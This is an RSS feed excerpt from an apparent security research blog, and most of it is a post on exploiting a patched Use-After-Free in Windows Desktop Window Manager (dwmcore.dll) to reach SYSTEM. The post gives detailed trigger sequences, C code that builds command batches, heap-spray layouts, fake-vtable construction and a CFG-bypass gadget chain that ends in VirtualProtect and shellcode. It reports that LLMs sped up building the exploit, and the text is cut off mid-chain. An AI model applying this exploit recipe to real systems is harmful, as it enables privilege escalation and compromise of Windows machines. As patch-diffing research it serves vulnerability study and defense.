<td align="left">Exception lists can be referenced via rule attributes.</td>
<td align="left"><strong>detection-rules:</strong> Teams managing exceptions as part of detection content. <strong>Terraform:</strong> Teams managing exceptions as separate infrastructure resources.</td>
</tr>
<tr>
<td align="left"><strong>Governance &amp; Drift Management</strong></td>
<td align="left">VCS-based with dual sync: push rules from repo to Kibana and export from Kibana back to repo, allowing either to serve as the source of truth. Drift detection is achievable with custom export-and-diff tooling.</td>
<td align="left">VCS-authoritative: state file enforces declared configuration.  Native drift detection: Terraform plan surfaces any out-of-band changes made in Kibana.</td>
<td align="left"><strong>detection-rules:</strong> Teams comfortable with Git-based workflows and flexible sync models. <strong>Terraform:</strong> Organisations requiring formal state reconciliation and audit trails.</td>
</tr>
<tr>
<td align="left"><strong>Rollback</strong></td>
<td align="left">Git history provides version control; re-import previous versions from the repo.</td>
<td align="left">Revert HCL configuration in Git and re-apply to restore the previous state.</td>
<td align="left"><strong>detection-rules:</strong> Teams using Git-centric recovery workflows. <strong>Terraform:</strong> Organisations with standardised rollback mechanisms across infrastructure and rulesets.</td>
</tr>
<tr>
<td align="left"><strong>Parameterisation &amp; Templating</strong></td>
<td align="left">Achievable with external preprocessing (Jinja2, etc.) before import.</td>
<td align="left">Native HCL features: variables, locals, for_each, dynamic blocks, and modules.</td>
<td align="left"><strong>detection-rules:</strong> Teams not requiring parameterisation or with existing templating solutions.  <strong>Terraform:</strong> Teams wanting native IaC parameterisation.</td>
</tr>
<tr>
<td align="left"><strong>Operational Integration</strong></td>
<td align="left">Focused tooling optimised for detection engineering workflows.</td>
<td align="left">Unified control plane managing detection rules alongside cloud infrastructure, network policies, and other security tooling.  Integrates with other resources that may be required by detections such as external connectors.</td>
<td align="left"><strong>detection-rules:</strong> Specialist detection teams. More flexible if dual-sync (Kibana and repo are both sources of truth).  <strong>Terraform:</strong> Platform teams managing Elastic as part of broader infrastructure.</td>
</tr>
</tbody>
</table>
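<p>As one example of the parameterisation the table mentions, native <code>for_each</code> can stamp out one exception item per approved account from a single resource block. The account names below are illustrative, and the attributes mirror the exception item resource shown earlier:</p>
<pre><code>variable &quot;approved_interactive_accounts&quot; {
  type    = set(string)
  default = [&quot;svc_sqlbackup&quot;, &quot;svc_legacyapp&quot;]
}

resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;approved&quot; {
  for_each       = var.approved_interactive_accounts
  list_id        = &quot;svc-account-interactive-login-exceptions&quot;
  item_id        = &quot;${replace(each.value, &quot;_&quot;, &quot;-&quot;)}-exception&quot;
  name           = &quot;${each.value} - approved interactive logon&quot;
  description    = &quot;Documented exception for ${each.value}&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;
  entries = [
    {
      field    = &quot;user.name&quot;
      type     = &quot;match&quot;
      operator = &quot;included&quot;
      value    = each.value
    }
  ]
}
</code></pre>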
<p>In short, Detection Engineers are better served by the specialized creation and testing tools provided in the <code>detection-rules</code> repository, while DevOps/Platform Teams should use the Terraform provider to manage detection rules as part of their broader infrastructure-as-code strategy for deployment and operations.</p>
<h2>Try it out</h2>
<p>To experience the full benefits of what Elastic has to offer for detection engineers, upgrade to 9.3 or start your Elastic Security <a href="https://cloud.elastic.co/registration">free trial</a>. Visit <a href="https://www.elastic.co/kr/security">elastic.co/security</a> to learn more and get started.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/managing-rules-with-terraform/managing-rules-with-terraform.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Patch diff to SYSTEM]]></title>
            <link>https://www.elastic.co/kr/security-labs/patch-diff-to-system</link>
            <guid>patch-diff-to-system</guid>
            <pubDate>Fri, 06 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Leveraging LLMs and patch diffing, this research details a Use-After-Free vulnerability in Windows DWM, demonstrating a reliable exploit that achieves escalation from low-privileged user permissions to SYSTEM.]]></description>
            <content:encoded><![CDATA[<h2>Intro</h2>
<p>Patch diffing has long fascinated me. I think part of it has to do with the race against the clock, reversing, exploiting, and trying to attain that “1day” exploit status. For advanced Windows targets, Valentina Palmiotti and Ruben Boonen <a href="https://www.ibm.com/think/x-force/patch-tuesday-exploit-wednesday-pwning-windows-ancillary-function-driver-winsock">proved</a> that this was already possible nearly 3 years ago. But, they are some of the world's most talented exploit devs. Can LLMs raise the capability floor for us mere mortals? Fortunately, and maybe a bit alarmingly, the answer is yes.</p>
<h2>The Hunt</h2>
<p>When the bulletin for the January 2026 Patch Tuesday dropped, I kicked off my search to identify one of the patched vulnerabilities and (hopefully) develop a working exploit for it. Top of the <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jan">target list</a> were any vulnerabilities already known to be exploited in the wild. The January patches included an in-the-wild information leak <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-20805">vulnerability</a> in Desktop Window Manager (DWM), which caught my eye, along with a second DWM vulnerability that could lead to local privilege escalation. Historically, DWM has been a <a href="https://www.elastic.co/kr/security-labs/itw-windows-lpe-0days-insights-and-detection-strategies">popular target</a> for local privilege escalation. Sometimes it can be tricky to identify the exact patched component, but for DWM, dwmcore.dll is always a safe bet.</p>
<p>After running both binaries through Ghidra and extracting BSim vectors for every function, highlighting the differences between them becomes quite easy. Not to mention, many Microsoft-patched vulnerabilities ship alongside new feature flags. Needless to say, Opus 4.5 made quick work of the diff and identified one of the vulnerabilities within minutes.</p>
<pre><code>======================================================================
BSim PATCH DIFF REPORT
======================================================================
File 1: dwmcore_vuln.dll
File 2: dwmcore_patched.dll 
======================================================================

----------------------------------------------------------------------------------------------------
TOP 10 MOST MODIFIED FUNCTIONS
----------------------------------------------------------------------------------------------------
  dwmcore_vuln.dll                      dwmcore_patched.dll                        Sim  Jaccard
----------------------------------------------------------------------------------------------------
  FUN_1802e7842                         FUN_1802e7842                           0.1191   0.0632
  FUN_1802e92d6                         FUN_1802e92d6                           0.1470   0.0722
  FUN_1802e5faa                         FUN_1802e5faa                           0.1741   0.0769
  ~CDelegatedInkCanvas                  ~CDelegatedInkCanvas                    0.7556   0.6047
  GetBufferedOutputTransformed          GetBufferedOutputTransformed            0.7628   0.6154
  FrameStarted                          FrameStarted                            0.7833   0.6429
  ~CSynchronousSuperWetInk              ~CSynchronousSuperWetInk                0.8018   0.6667
  FUN_1802f5aa2                         FUN_1802f5aa2                           0.9127   0.8393
  FUN_1802f57d2                         FUN_1802f5d72                           0.9127   0.8393
======================================================================
</code></pre>
<p>From here, I have to say that building a functional exploit was painfully slower than I had hoped. I spent many long nights and weekends poking and prodding the model along; a lot of that came down to my own unfamiliarity with the bug class and subsystem. Eventually, we did prevail, achieving code execution inside DWM from low privilege and escalating to SYSTEM. In the process, I discovered multiple novel exploitation techniques, like the GetRECT spray, new gadget chains, and a DWM-to-SYSTEM path. With these techniques (and some other tooling) in hand, plus newer model releases like Opus 4.6, the time from discovering a UAF vulnerability in DWM to a functional exploit dropped from three weeks to a matter of hours.</p>
<h2>The Bug</h2>
<p>The vulnerability is a Use-After-Free in <code>CSynchronousSuperWetInk::~CSynchronousSuperWetInk</code>. The destructor conditionally removes the object from <code>CSuperWetInkManager</code> based on the return value of <code>IsSuperWetCompatible()</code>.</p>
<pre><code class="language-c">void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) {
    this-&gt;vtable = &amp;_vftable_;
    bool bVar2 = IsSuperWetCompatible(this);
    if (bVar2) {
        CSuperWetInkManager::RemoveSource(this-&gt;composition-&gt;superWetInkManager, this);
    }
    // ... cleanup continues
}
</code></pre>
<p><em>The vulnerable destructor in dwmcore.dll version 10.0.26100.7309.</em></p>
<h3>IsSuperWetCompatible Condition</h3>
<pre><code class="language-c">bool CSynchronousSuperWetInk::IsSuperWetCompatible(CSynchronousSuperWetInk *this) {
    if ((this-&gt;LookupMode == 2 || this-&gt;notifier1 != NULL) &amp;&amp;
        this-&gt;clipEntry != NULL &amp;&amp; this-&gt;comObject != NULL) {
        return true;
    }
    return false;
}
</code></pre>
<p><em>The IsSuperWetCompatible condition in dwmcore.dll version 10.0.26100.7309.</em></p>
<p>The function returns <code>true</code> only when (<code>LookupMode</code> equals 2 or <code>notifier1</code> is set) and both <code>clipEntry</code> and <code>comObject</code> are non-null.</p>
<h3>Triggering the UAF</h3>
<p>An attacker can:</p>
<ol>
<li>Register a <code>CSynchronousSuperWetInk</code> with the manager (requires <code>LookupMode=2</code> during <code>Draw()</code>)</li>
<li>Change <code>LookupMode</code> to 0 via <code>CMD_SET_PROPERTY</code></li>
<li>Trigger destruction via <code>CMD_RELEASE_RESOURCE</code></li>
<li><code>IsSuperWetCompatible()</code> returns FALSE → <code>RemoveSource()</code> is <strong>skipped</strong></li>
<li>A dangling pointer remains in <code>CSuperWetInkManager::localStrokesVector</code></li>
</ol>
<p>When DWM later iterates this vector (e.g., in <code>DirtyActiveInk</code>), it dereferences the freed object's vtable, leading to controlled code execution.</p>
<h3>The Fix</h3>
<p>The patch adds a feature flag (<code>Feature_1732988217</code>). When enabled, <code>RemoveSource()</code> is called <strong>unconditionally</strong>, regardless of <code>IsSuperWetCompatible()</code>. This ensures the object is always properly unregistered from the manager during destruction, eliminating the dangling pointer.</p>
<pre><code class="language-c">void CSynchronousSuperWetInk::~CSynchronousSuperWetInk(CSynchronousSuperWetInk *this) {
    *(undefined ***)this = &amp;_vftable_;
    bool bVar2 = wil::details::FeatureImpl&lt;Feature_1732988217&gt;::__private_IsEnabled(&amp;impl);
    if (!bVar2) {
        bVar2 = IsSuperWetCompatible(this);
        if (!bVar2) goto LAB_1802a9b1a;  // Skip RemoveSource only if feature disabled AND !compatible
    }
    CSuperWetInkManager::RemoveSource(..., this);
LAB_1802a9b1a:
    // ... cleanup continues
}
</code></pre>
<p><em>The fixed destructor in dwmcore.dll version 10.0.26100.7623.</em></p>
<h2>The Exploit</h2>
<p>The UAF can be triggered from a regular user-mode application via the <a href="https://learn.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal">DirectComposition API</a>. The attack requires no special privileges.</p>
<h3>Prerequisites</h3>
<ol>
<li><strong>D3D11/DXGI Infrastructure</strong>: Create a D3D11 device with BGRA support and a swap chain for a visible window.</li>
<li><strong>DirectComposition Device</strong>: Initialize via <code>DCompositionCreateDevice()</code> with the DXGI device.</li>
<li><strong>NtDComposition Syscall Access</strong>: Hook or directly call <code>NtDCompositionProcessChannelBatchBuffer</code> and <code>NtDCompositionCommitChannel</code> via <code>win32u.dll</code> to inject raw batch buffer commands.</li>
</ol>
<h3>Trigger Sequence</h3>
<h4>Step 1: Create Ink Trail (Allocate CSynchronousSuperWetInk)</h4>
<p>Query <code>IDCompositionInkTrailDevice</code> from the DirectComposition device, then call <code>CreateDelegatedInkTrailForSwapChain()</code> or <code>CreateDelegatedInkTrail()</code>. This allocates a <code>CSynchronousSuperWetInk</code> object (resource type <code>0xa8</code>) in dwm.exe's heap.</p>
<h4>Step 2: Create Visual and Set LookupMode=2</h4>
<p>Inject batch buffer commands to:</p>
<ol>
<li>Create a <code>CSuperWetInkVisual</code> (type <code>0xa5</code>) with <code>CMD_CREATE_RESOURCE</code> (0x02)</li>
<li>Connect visual to ink source: <code>CMD_SET_REFERENCE</code> (0x10) with propId <code>0x34</code></li>
<li>Set <code>LookupMode=2</code> on the ink source via <code>CMD_SET_PROPERTY</code> (0x0B) with propId <code>10</code></li>
<li>Connect to composition tree: <code>CMD_SET_REFERENCE</code> to handles 1 and 2 (composition target / marshaler) with propId <code>0x34</code></li>
</ol>
<p>LookupMode=2 ensures <code>IsSuperWetCompatible()</code> returns TRUE during <code>Draw()</code>, which registers the object with <code>CSuperWetInkManager::localStrokesVector</code>.</p>
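<p>The batch construction in steps 1–4 amounts to serializing fixed-layout command structs into a buffer. The sketch below models that serialization in plain C; the command IDs, resource type, and property IDs come from this write-up, but the exact field layouts are illustrative assumptions, not the real marshaler wire format:</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* Command IDs from this write-up; struct layouts below are
   illustrative assumptions, not the exact wire format. */
enum {
    CMD_CREATE_RESOURCE = 0x02,
    CMD_SET_PROPERTY    = 0x0B,
    CMD_SET_REFERENCE   = 0x10,
};

typedef struct { uint32_t cmdId, handle, resourceType; } CmdCreateResource;
typedef struct { uint32_t cmdId, handle, propId, value; } CmdSetProperty;
typedef struct { uint32_t cmdId, handle, propId, refHandle; } CmdSetReference;

/* Append one command to the batch buffer, returning the new offset. */
static size_t emit(uint8_t *batch, size_t off, const void *cmd, size_t len) {
    memcpy(batch + off, cmd, len);
    return off + len;
}

size_t build_trigger_batch(uint8_t *batch, uint32_t visual, uint32_t ink) {
    size_t off = 0;
    CmdCreateResource create = { CMD_CREATE_RESOURCE, visual, 0xa5 };    /* CSuperWetInkVisual */
    CmdSetReference   attach = { CMD_SET_REFERENCE, visual, 0x34, ink }; /* visual -&gt; ink source */
    CmdSetProperty    mode   = { CMD_SET_PROPERTY, ink, 10, 2 };         /* LookupMode = 2 */
    off = emit(batch, off, &amp;create, sizeof create);
    off = emit(batch, off, &amp;attach, sizeof attach);
    off = emit(batch, off, &amp;mode, sizeof mode);
    return off;
}
</code></pre>
<p>In the real exploit, a buffer built this way is handed to <code>NtDCompositionProcessChannelBatchBuffer</code> followed by <code>NtDCompositionCommitChannel</code>.</p>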
<h4>Step 3: Render Frames to Register with Manager</h4>
<p>Present multiple frames (<code>IDXGISwapChain::Present</code>) and commit DirectComposition changes. This triggers DWM's render loop, which calls into the ink infrastructure and registers the <code>CSynchronousSuperWetInk</code> pointer in the manager's internal vector.</p>
<h4>Step 4: Set LookupMode=0 (Bypass Removal Check)</h4>
<p>Inject <code>CMD_SET_PROPERTY</code> to change <code>LookupMode</code> to <code>0</code>. Now <code>IsSuperWetCompatible()</code> will return FALSE because:</p>
<pre><code class="language-c">if ((this-&gt;LookupMode == 2 || this-&gt;notifier1 != NULL) &amp;&amp; ...)
</code></pre>
<p>With <code>LookupMode</code> = 0 and no notifier, the first condition fails.</p>
<h4>Step 5: Release Ink Trail (Create Dangling Pointer)</h4>
<ol>
<li>Disconnect visual references: <code>CMD_SET_REFERENCE</code> with refHandle=0 for all connections</li>
<li>Release the <code>IDCompositionDelegatedInkTrail</code> interface</li>
</ol>
<p>When the destructor <code>~CSynchronousSuperWetInk</code> runs:</p>
<ul>
<li>It calls <code>IsSuperWetCompatible()</code> which returns <strong>FALSE</strong> (LookupMode=0)</li>
<li><code>RemoveSource()</code> is <strong>SKIPPED</strong></li>
<li>The object is freed but its pointer <strong>remains</strong> in <code>CSuperWetInkManager::localStrokesVector</code></li>
</ul>
<h4>Step 6: Trigger DirtyActiveInk (Use-After-Free)</h4>
<p>Continue presenting frames and invalidating the window. DWM's composition loop calls <code>CSuperWetInkManager::DirtyActiveInk()</code>, which iterates <code>localStrokesVector</code> and dereferences the dangling pointer:</p>
<pre><code class="language-c">pcVar2 = *(code **)((longlong)((CResource *)*puVar4)-&gt;vtable + 0x50);
</code></pre>
<h3>Crash Behavior</h3>
<p>Without a heap spray, DWM crashes when accessing freed memory:</p>
<pre><code> # Call Site
00 ntdll!KiUserExceptionDispatch
01 0x00007ffe`f23270d1
02 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xae
03 dwmcore!CComposition::PreRender+0x99f
04 dwmcore!CComposition::ProcessComposition+0x1d7
05 dwmcore!CConnection::MainCompositionThreadLoop+0x4a
</code></pre>
<p>If the freed memory is reclaimed by another object (e.g., <code>CInteractionTrackerScaleAnimation</code>), the crash occurs at an unexpected vtable:</p>
<pre><code>kd&gt; dps rcx
00000201`fbef65f0  00007ffe`ebf60014 dwmcore!CInteractionTrackerScaleAnimation::`vftable'+0x24
</code></pre>
<p>By controlling what data reclaims the freed allocation, an attacker can craft a fake vtable and achieve arbitrary code execution via the virtual call at <code>vtable+0x50</code>.</p>
<h2>Heap Spray</h2>
<p>To exploit the UAF, we must reclaim the freed <code>CSynchronousSuperWetInk</code> allocation with attacker-controlled data containing a fake vtable. This section documents the CRegionGeometry RECT buffer spray technique we refer to as GetRECT.</p>
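<p>The spray's premise is that a freed slot in an LFH bucket is handed back to a later same-size allocation. The toy fixed-size allocator below models one subsegment (57 slots of 288 bytes) with a LIFO free list; this is a deliberate simplification, since the real LFH randomizes slot selection, which is exactly why the exploit sprays many RECT buffers rather than relying on a single allocation:</p>
<pre><code class="language-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Toy model of one LFH subsegment: 57 slots of 288 bytes.
   (The real LFH randomizes slot selection; this model is LIFO.) */
#define SLOTS 57
#define SLOT_SIZE 288

static uint8_t subsegment[SLOTS][SLOT_SIZE];
static int free_list[SLOTS];
static int free_top = 0;

static void bucket_init(void) {
    free_top = SLOTS;
    for (int i = 0; i &lt; SLOTS; i++)
        free_list[i] = SLOTS - 1 - i;   /* slot 0 is popped first */
}

static void *bucket_alloc(void) {
    return free_top ? subsegment[free_list[--free_top]] : NULL;
}

static void bucket_free(void *p) {
    /* Push the slot index back on the free list. */
    free_list[free_top++] = (int)(((uint8_t (*)[SLOT_SIZE])p) - subsegment);
}
</code></pre>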
<h3>Target Object Properties</h3>
<table>
<thead>
<tr>
<th align="left">Property</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Object</td>
<td align="left"><code>CSynchronousSuperWetInk</code></td>
</tr>
<tr>
<td align="left">Size</td>
<td align="left">0x120 (288 bytes)</td>
</tr>
<tr>
<td align="left">Allocator</td>
<td align="left"><code>DefaultHeap::AllocClear</code> → <code>GetProcessHeap()</code></td>
</tr>
<tr>
<td align="left"><a href="https://learn.microsoft.com/en-us/windows/win32/memory/low-fragmentation-heap">LFH</a> Bucket</td>
<td align="left">34 (273-288 byte range)</td>
</tr>
<tr>
<td align="left">Slots per <a href="https://blackhat.com/docs/us-16/materials/us-16-Yason-Windows-10-Segment-Heap-Internals.pdf">Subsegment</a></td>
<td align="left">57</td>
</tr>
</tbody>
</table>
<h3>Spray Primitive: CRegionGeometry RECT Buffer</h3>
<p>The spray uses <code>CRegionGeometry</code> resources (type <code>0x81</code>) with RECT array data:</p>
<table>
<thead>
<tr>
<th align="left">Property</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Resource Type</td>
<td align="left"><code>0x81</code> (CRegionGeometry)</td>
</tr>
<tr>
<td align="left">Spray Size</td>
<td align="left">18 RECTs × 16 bytes = <strong>288 bytes</strong></td>
</tr>
<tr>
<td align="left">Allocator</td>
<td align="left"><code>std::_Allocate&lt;16&gt;</code> → <code>HeapAlloc(GetProcessHeap(), 0, 288)</code></td>
</tr>
<tr>
<td align="left">LFH Bucket</td>
<td align="left">34, <strong>same as target</strong></td>
</tr>
<tr>
<td align="left">Content Control</td>
<td align="left">72 int32 values (18 RECTs × 4 fields)</td>
</tr>
</tbody>
</table>
<p><strong>Allocation Chain</strong>:</p>
<pre><code>dcomp.dll:   SetRectangles → ResourceSetBufferPropertyCustomWrite
win32kbase:  CRegionGeometryMarshaler::SetBufferProperty → CMarshaledArray::Copy
dwmcore.dll: SetRectangles → std::vector::_Insert_counted_range
             → std::_Allocate&lt;16&gt; → HeapAlloc(GetProcessHeap(), 0, 288)
</code></pre>
<p>The RECT buffer is written via <code>CMD_SET_BUFFER_PROPERTY</code> (0x0F) with propId <code>5</code>:</p>
<pre><code class="language-c">struct CmdSetResourceBufferProperty {
    uint32_t cmdId;      // 0x0F
    uint32_t handle;     // Resource handle
    uint32_t propId;     // 5 for RECT array
    uint32_t dataSize;   // 288 for 18 RECTs
    // Variable-length RECT data follows (4-byte aligned)
};
</code></pre>
<h3>RECT Layout for Fake Object</h3>
<p>The 18 RECTs (288 bytes) provide full control over the reclaimed memory:</p>
<pre><code class="language-c">struct SprayRECT {
    int32_t left;    // +0x00 within RECT
    int32_t top;     // +0x04
    int32_t right;   // +0x08
    int32_t bottom;  // +0x0C
};
// Total: 72 int32 values = complete coverage of CSynchronousSuperWetInk fields

// Key offsets for exploit:
// +0x00: fake vtable pointer (RECT[0].left/top)
</code></pre>
<p>Helper to write 64-bit values into adjacent RECT fields:</p>
<pre><code class="language-c">static void SetU64(int32_t* lo, int32_t* hi, uint64_t val) {
    *lo = (int32_t)(val &amp; 0xFFFFFFFF);
    *hi = (int32_t)(val &gt;&gt; 32);
}
</code></pre>
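<p>For instance, planting a fake vtable pointer at spray offset <code>+0x00</code> splits a 64-bit value across <code>RECT[0].left</code> and <code>RECT[0].top</code> (the address below is a placeholder, not a real KCT entry):</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

typedef struct { int32_t left, top, right, bottom; } SprayRECT;

static void SetU64(int32_t *lo, int32_t *hi, uint64_t val) {
    *lo = (int32_t)(val &amp; 0xFFFFFFFF);
    *hi = (int32_t)(val &gt;&gt; 32);
}

/* Place a (placeholder) fake vtable pointer at spray offset +0x00. */
uint64_t demo_fake_vtable(void) {
    SprayRECT spray[18] = {0};                       /* 18 * 16 = 288 bytes */
    uint64_t fake_vtbl = 0x00007ffe11223344ULL;      /* placeholder address */
    SetU64(&amp;spray[0].left, &amp;spray[0].top, fake_vtbl);
    uint64_t readback;
    memcpy(&amp;readback, &amp;spray[0], sizeof readback);   /* little-endian reassembly */
    return readback;
}
</code></pre>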
<h3>Exploitation Primitive</h3>
<p>The UAF gives us a <strong>controlled vtable call with RCX pointing to our sprayed object</strong>. When <code>DirtyActiveInk</code> iterates the dangling pointer:</p>
<pre><code class="language-c">pcVar2 = *(code **)((longlong)((CResource *)*puVar4)-&gt;vtable + 0x50);
(*pcVar2)();  // call [[spray]+0x50] with RCX = spray
</code></pre>
<p><strong>Call site stack:</strong></p>
<pre><code>00 dwmcore!CSuperWetInkManager::DirtyActiveInk+0xa9
01 dwmcore!CComposition::PreRender+0x99f
02 dwmcore!CComposition::ProcessComposition+0x1d7
03 dwmcore!CConnection::MainCompositionThreadLoop+0x4a
04 dwmcore!CConnection::RunCompositionThread+0x142
05 KERNEL32!BaseThreadInitThunk+0x17
06 ntdll!RtlUserThreadStart+0x2c
</code></pre>
<p><strong>Register state at dispatch:</strong></p>
<ul>
<li><code>RCX</code> = pointer to sprayed object (our controlled 288 bytes)</li>
<li><code>RIP</code> = <code>[[spray]+0x50]</code> (function pointer from fake vtable)</li>
</ul>
<h3>Target Function Constraints</h3>
<p>There are initially two restrictions on what we can call:</p>
<ol>
<li>The target must be <strong>in the CFG bitmap</strong> (marked as valid call target)</li>
<li>The target must have a <strong>pointer to it</strong> (in IAT, vtable, or other readable memory)</li>
</ol>
<p>We cannot directly call arbitrary addresses; only functions that satisfy both conditions.</p>
<h3>Gadget Chain: __fnINSTRING + CStdAsyncStubBuffer2_Disconnect</h3>
<p>With the UAF giving us a controlled vtable call (<code>RIP = [[spray]+0x50]</code>, <code>RCX = spray</code>), the remaining challenge is chaining CFG-valid gadgets to achieve arbitrary code execution. Direct shellcode execution is blocked by CFG, and we have no heap address leak. We developed a novel gadget chain that solves both problems, but it required two successful exploit attempts in sequence, lowering overall reliability. We therefore pivoted to a <a href="https://ti.qianxin.com/blog/articles/public-secret-research-on-the-cve-2024-30051-privilege-escalation-vulnerability-in-the-wild-en/">known public</a> technique using two Windows system DLL gadgets: <code>__fnINSTRING</code> (user32.dll) and <code>CStdAsyncStubBuffer2_Disconnect</code> (combase.dll).</p>
<h4>Stage 1: __fnINSTRING - Kernel Callback Dispatch Without a Leak</h4>
<p>The Windows kernel communicates back to user mode through the <code>KernelCallbackTable</code> (KCT), a function pointer table stored in the PEB at offset <code>+0x58</code>. Each entry points to a <code>__fn*</code> handler in <code>user32.dll</code>. These functions are CFG-valid call targets and have pointers to them in readable memory (the KCT itself), satisfying both constraints.</p>
<p>We point the fake vtable at <code>&amp;KCT[fnINSTRING_index] - 0x50</code>. When DirtyActiveInk dereferences <code>[[spray]+0x50]</code>, it reads the KCT entry and dispatches to <code>__fnINSTRING</code>:</p>
<pre><code>[[spray]+0x50]
  = [KCT_entry_addr - 0x50 + 0x50]
  = [KCT_entry_addr]
  = &amp;__fnINSTRING
</code></pre>
<p>What makes this useful is what <code>__fnINSTRING</code> does internally. It treats its argument (our spray buffer) as a <code>_CAPTUREBUF</code> structure and calls <code>FixupCallbackPointers</code> before dispatching the inner function. <code>FixupCallbackPointers</code> reads a fixup table from the buffer and converts relative offsets into absolute addresses by adding the buffer's base address:</p>
<pre><code class="language-c">// Simplified FixupCallbackPointers logic:
void FixupCallbackPointers(_CAPTUREBUF* buf) {
    if (buf-&gt;guard != 0) return;  // already fixed up - skip
    int32_t* fixups = (int32_t*)((char*)buf + buf-&gt;fixupTableOffset);
    for (int i = 0; i &lt; buf-&gt;fixupCount; i++) {
        int32_t* target = (int32_t*)((char*)buf + fixups[i]);
        *(uint64_t*)target += (uint64_t)buf;  // relative → absolute
    }
}
</code></pre>
<p>This eliminates the need for a heap address leak. We embed relative offsets in the spray buffer, and <code>FixupCallbackPointers</code> patches them to absolute pointers at runtime using the buffer's own address. After fixup, <code>__fnINSTRING</code> dispatches the inner function pointer at <code>+0x48</code> with the arguments at <code>+0x28</code> (RCX), <code>+0x30</code> (EDX), <code>+0x38</code> (R8), and <code>+0x50</code> (R9).</p>
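<p>A user-mode simulation of this fixup pass shows the mechanics end to end. The offsets mirror the spray layout in this write-up: fixup count at <code>+0x08</code>, fixup table offset at <code>+0x18</code>, and the guard at <code>+0x20</code>, which is itself a fixup entry, so it becomes nonzero after the first pass and blocks re-fixup:</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* 288-byte spray buffer; the union forces 8-byte alignment. */
typedef union {
    uint8_t  bytes[0x120];
    uint64_t align;
} CaptureBuf;

static void fixup_callback_pointers(CaptureBuf *buf) {
    uint8_t *base = buf-&gt;bytes;
    uint64_t guard;
    memcpy(&amp;guard, base + 0x20, sizeof guard);
    if (guard != 0) return;                        /* already fixed up - skip */
    uint32_t count, tbl_off;
    memcpy(&amp;count, base + 0x08, sizeof count);
    memcpy(&amp;tbl_off, base + 0x18, sizeof tbl_off);
    for (uint32_t i = 0; i &lt; count; i++) {
        int32_t entry;
        memcpy(&amp;entry, base + tbl_off + 4u * i, sizeof entry);
        uint64_t slot;
        memcpy(&amp;slot, base + entry, sizeof slot);
        slot += (uint64_t)(uintptr_t)base;         /* relative -&gt; absolute */
        memcpy(base + entry, &amp;slot, sizeof slot);
    }
}
</code></pre>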
<p>We set the inner function to <code>CStdAsyncStubBuffer2_Disconnect</code>.</p>
<h4>Stage 2: CStdAsyncStubBuffer2_Disconnect - Two Chained Vtable Calls</h4>
<p><code>CStdAsyncStubBuffer2_Disconnect</code> is exported from <code>combase.dll</code>, making it CFG-valid with a stable address. Its disassembly reveals a useful primitive: two sequential vtable dispatches with preserved argument registers:</p>
<pre><code>; CStdAsyncStubBuffer2_Disconnect (simplified)
MOV  RBX, RCX             ; save this
MOV  RCX, [RCX-8]         ; load [this-8] -&gt; fake_obj_1
TEST RCX, RCX
JZ   skip1
MOV  RAX, [RCX]           ; vtable
MOV  RAX, [RAX+0x20]      ; vtable[4]
CALL guard_dispatch_icall  ; CALL #1: [[this-8]+0x20]  ← VirtualProtect

skip1:
XOR  ECX, ECX
XCHG [RBX+0x10], RCX      ; DEFUSE: read [this+0x10], zero it
TEST RCX, RCX
JZ   skip2
MOV  RAX, [RCX]           ; vtable
MOV  RAX, [RAX+0x10]      ; vtable[2]
CALL guard_dispatch_icall  ; CALL #2: [[[this+0x10]]+0x10]  ← shellcode

skip2:
ADD  RSP, 0x20
POP  RBX
RET
</code></pre>
<p><code>RDX</code>, <code>R8</code>, and <code>R9</code> are <strong>preserved through both calls</strong>, arriving untouched from <code>__fnINSTRING</code>'s argument setup. This gives us full control over the first three arguments to both vtable calls.</p>
<h4>Vtable Call #1: VirtualProtect → RWX</h4>
<p>We construct a self-referential fake object at <code>+0xC8</code> in the spray buffer: <code>[+0xC8]</code> points to itself (after fixup), so dereferencing <code>[RCX] → [RCX+0x20]</code> reads <code>VirtualProtect</code>'s address from <code>+0xE8</code>. The arguments (preserved from <code>__fnINSTRING</code> dispatch) are:</p>
<table>
<thead>
<tr>
<th align="left">Register</th>
<th align="left">Value</th>
<th align="left">Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">RCX</td>
<td align="left">base+0xC8 (fake_obj_1)</td>
<td align="left">lpAddress (start of spray buffer region)</td>
</tr>
<tr>
<td align="left">RDX</td>
<td align="left">0x1000</td>
<td align="left">dwSize</td>
</tr>
<tr>
<td align="left">R8</td>
<td align="left">0x40</td>
<td align="left">flNewProtect (<code>PAGE_EXECUTE_READWRITE</code>)</td>
</tr>
<tr>
<td align="left">R9</td>
<td align="left">base+0xC0</td>
<td align="left">lpflOldProtect (output slot in spray buffer)</td>
</tr>
</tbody>
</table>
<p>After this call, the spray buffer's memory page is marked RWX, and the CFG bitmap is updated to allow execution from this region.</p>
<h4>Vtable Call #2: Inline Shellcode</h4>
<p>After VirtualProtect returns, Disconnect loads <code>[this+0x10]</code> into RCX for the second vtable dispatch:</p>
<pre><code>XOR  ECX, ECX
XCHG [RBX+0x10], RCX      ; RCX = [base+0x90] = base+0xA0 (fake_obj_2)
TEST RCX, RCX
JZ   skip2                 ; non-zero → take the call
MOV  RAX, [RCX]            ; RAX = [base+0xA0] = base+0xA8 (fake vtable_2)
MOV  RAX, [RAX+0x10]       ; RAX = [base+0xB8] = base+0xD0 (shellcode!)
CALL guard_dispatch_icall   ; call base+0xD0
</code></pre>
<p>The pointer chain resolves step by step:</p>
<ol>
